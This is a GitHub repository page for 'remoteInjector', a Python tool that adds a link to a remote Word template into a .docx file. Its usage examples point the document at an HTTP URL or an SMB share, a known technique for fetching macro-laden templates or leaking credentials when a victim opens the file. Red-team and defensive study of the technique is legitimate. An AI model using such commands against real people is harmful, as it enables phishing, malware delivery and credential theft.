Skip to content
 
 

Latest commit

 

History

9 Commits

Folders and files

NameName
Last commit message
Last commit date
 
 
 
 

Repository files navigation

remoteInjector

Injects link to remote word template into word document.

Related Blog Post

Requirements

  • Python2.7

Usage

usage: remoteinjector.py [-h] [-w URL] F

Inject Template Through Relationship Settings

positional arguments:
  F           .docx file to inject template into

optional arguments:
  -h, --help  show this help message and exit
  -w URL      remote url to template

Example of use
To inject remote http url:

remoteinjector.py -w https://example.com/template.dotm example.docx

To inject SMB path:

remoteinjector.py -w \\1.1.1.1\C$\TEMP\template.dotm example.docx

About

Inject remote template link into word document for remote template injection

Resources

Stars

1 star

Watchers

0 watching

Forks

Releases

Packages

Contributors

Languages